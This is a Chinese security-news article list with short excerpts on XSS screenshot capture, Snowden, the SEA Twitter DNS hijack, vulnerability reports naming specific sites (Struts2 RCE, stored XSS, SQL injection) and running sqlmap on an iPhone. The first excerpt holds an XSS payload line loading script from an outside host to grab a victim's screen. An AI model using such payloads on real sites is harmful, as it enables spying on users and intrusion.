文章列表
利用XSS截取屏幕截图
文章来源:y35u2个月前,长短短(Sogili)在群里发了一个html2canvas.js 并给了一个POC我写了一个完整的js来获得对方的屏幕截图看代码document.write("<script src=\"http:\/\/xj.hk\/html2canvas.js\"><\/script>"); <br>//调用截屏核心功能js,下载地址:http://xj.hk/html2canvas.js window.onload
揭秘斯诺登如何利用美情报信息技术安全漏洞
据中国国防科技信息网报道,根据美国NBC新闻的一份报告,前美国国家安全局(NSA)雇员爱德华·斯诺登之所以能够 泄露美国秘密监听计划,是由于其利用了作为系统管理员的广泛访问权限和NSA计算机系统存在的安全漏洞。根据某情报官员的透露,斯诺登并没有采取复杂的方法来掩盖其从NSA网络中窃取机密信息的
港媒:黑客盗资料 港中小企业网络安全堪忧
中新网8月29日电 据香港《大公报》报道,斯诺登泄密风暴揭发香港网络保安不堪一击,风暴过后复归平静,香港中小企计算机保安水平低问题依旧。专家指出,黑客近年喜以“僵尸”手法入侵盗取资料,有公司员工误开恶性电邮附件,计算机变成“僵尸”被操控亦懵然不知,最终令全公司计算机受感染。 香港
SEA利用域名注册系统漏洞修改记录攻击Twitter和纽约时报等热门网站ZT
黑客集团叙利亚电子军队(SEA)日前宣布已经发起了对Twitter、纽约时报等高人气网站的攻击,并成功控制了Twitter.com的网站域名记录。根据现在Twitter.com的whois记录显示这个网站的拥有者已经变成了SEA SEA,而邮件联系方式已经变成了[email protected]。A Syrian Electronic Army e-mail address is listed
中国电信(189.cn)某分站 最新struts2命令执行漏洞
中国电信(189.cn)某分站 最新struts2命令执行漏洞
51CTO (51cto.com)某分站 存储型XSS跨站漏洞
51CTO (51cto.com)某分站 存储型XSS跨站漏洞
瑞丽女性网(rayli.com)miyou分站 SQL注入漏洞
瑞丽女性网(rayli.com)miyou分站 SQL注入漏洞
证券之星(stockstar.com)某分站 SQL注入漏洞
证券之星(stockstar.com)某分站 SQL注入漏洞
转载 细数ZoomEye暂停服务背后的故事
一会要开庭了,长话短说,小弟等待开庭的时候,无聊,想上ZoomEye看看,结果发现提示“网站数据库系统升级,暂停服务”的字样。这个不禁让我和小伙伴们联想偏偏,究竟是真正的系统升级呢?还是另有其他问题,让我们一起走进系统升级背后的故事吧!天一个人觉得呢,背后的事情肯定不会是系统升级这么简
iphone上安装运行sqlmap
本人亲测 成功跑注入~有wifi更好 没有的话3G卡也凑合把sqlmap是神器阿阿阿阿走到哪跑到那 想想~在星巴克 拿着iphone ipad 用那里的wifi 跑着 哈哈哈那一定很爽阿不扯了- - 只需要几步就可以完成的01 sqlmap运行的环境 Python2.7很多人在cydia里装过Python 但是版本太低了 sqlmap需要2.7以上的版本Pyt
